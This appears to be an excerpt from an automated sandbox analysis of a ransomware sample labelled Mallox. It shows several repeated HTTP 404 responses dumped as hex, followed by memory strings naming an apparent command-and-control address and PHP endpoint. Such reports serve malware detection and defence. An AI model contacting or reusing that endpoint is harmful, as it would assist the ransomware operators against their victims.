      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 05 Nov 2024 12:23:28 GMTServer: ApacheAccept-Ranges: bytesCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Keep-Alive: timeout=5, max=100Connection: Keep-AliveTransfer-Encoding: chunkedContent-Type: text/htmlData Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 35 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0d 0a 33 0d 0a 34 30 34 0d 0a 31 0d 0a 20 0d 0a 39 0d 0a 4e 6f 74 20 46 6f 75 6e 64 0d 0a 31 66 63 61 0d 0a 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 05 Nov 2024 12:23:30 GMTServer: ApacheAccept-Ranges: bytesCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Keep-Alive: timeout=5, max=100Connection: Keep-AliveTransfer-Encoding: chunkedContent-Type: text/htmlData Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 35 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0d 0a 33 0d 0a 34 30 34 0d 0a 31 0d 0a 20 0d 0a 39 0d 0a 4e 6f 74 20 46 6f 75 6e 64 0d 0a 31 66 63 61 0d 0a 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 05 Nov 2024 12:23:31 GMTServer: ApacheAccept-Ranges: bytesCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Keep-Alive: timeout=5, max=100Connection: Keep-AliveTransfer-Encoding: chunkedContent-Type: text/htmlData Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 35 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0d 0a 33 0d 0a 34 30 34 0d 0a 31 0d 0a 20 0d 0a 39 0d 0a 4e 6f 74 20 46 6f 75 6e 64 0d 0a 31 66 63 61 0d 0a 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 05 Nov 2024 12:23:32 GMTServer: ApacheAccept-Ranges: bytesCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Keep-Alive: timeout=5, max=100Connection: Keep-AliveTransfer-Encoding: chunkedContent-Type: text/htmlData Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 35 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0d 0a 33 0d 0a 34 30 34 0d 0a 31 0d 0a 20 0d 0a 39 0d 0a 4e 6f 74 20 46 6f 75 6e 64 0d 0a 31 66 63 61 0d 0a 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 05 Nov 2024 12:23:33 GMTServer: ApacheAccept-Ranges: bytesCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Keep-Alive: timeout=5, max=100Connection: Keep-AliveTransfer-Encoding: chunkedContent-Type: text/htmlData Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 35 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0d 0a 33 0d 0a 34 30 34 0d 0a 31 0d 0a 20 0d 0a 39 0d 0a 4e 6f 74 20 46 6f 75 6e 64 0d 0a 31 66 63 61 0d 0a 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 05 Nov 2024 12:23:35 GMTServer: ApacheAccept-Ranges: bytesCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Keep-Alive: timeout=5, max=100Connection: Keep-AliveTransfer-Encoding: chunkedContent-Type: text/htmlData Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 35 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0d 0a 33 0d 0a 34 30 34 0d 0a 31 0d 0a 20 0d 0a 39 0d 0a 4e 6f 74 20 46 6f 75 6e 64 0d 0a 31 66 63 61 0d 0a 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20
      Source: Ransomware Mallox.exe, 00000000.00000003.1455252517.0000023CAFEA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.215.85.142/
      Source: Ransomware Mallox.exe, 00000000.00000003.1515736964.0000023CAFF0F000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1551313529.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1531166316.0000023CAFF0F000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1510198767.0000023CAFF28000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1515993832.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1545983166.0000023CAFF0F000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1505219295.0000023CADEF4000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1447919037.0000023CAFF28000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1525702943.0000023CAFF28000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1692939049.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1533218205.0000023CAFF0F000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1503545999.0000023CADEF4000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1524213941.0000023CAFF28000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1505219295.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1509849904.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1467266449.0000023CAFF0F000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1447919037.0000023CAFF0F000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1487048074.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1507859258.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1537894611.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1489751960.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.215.85.142/QWEwqdsvsf/ap.php
